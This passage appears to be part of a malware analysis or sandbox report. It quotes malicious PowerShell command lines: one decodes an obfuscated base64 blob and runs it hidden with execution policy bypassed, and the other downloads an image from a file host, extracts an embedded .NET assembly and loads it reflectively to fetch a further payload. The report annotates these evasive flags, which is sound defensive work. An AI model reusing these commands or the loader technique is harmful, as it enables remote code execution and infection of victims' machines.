ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIYwB1ShUWCcUzBkdICcShUWCcUzBkdIKQShUWCcUzBkdIpShUWCcUzBkdIShUWCcUzBkdI==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" | ||||||
parent_process | powershell.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))" |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |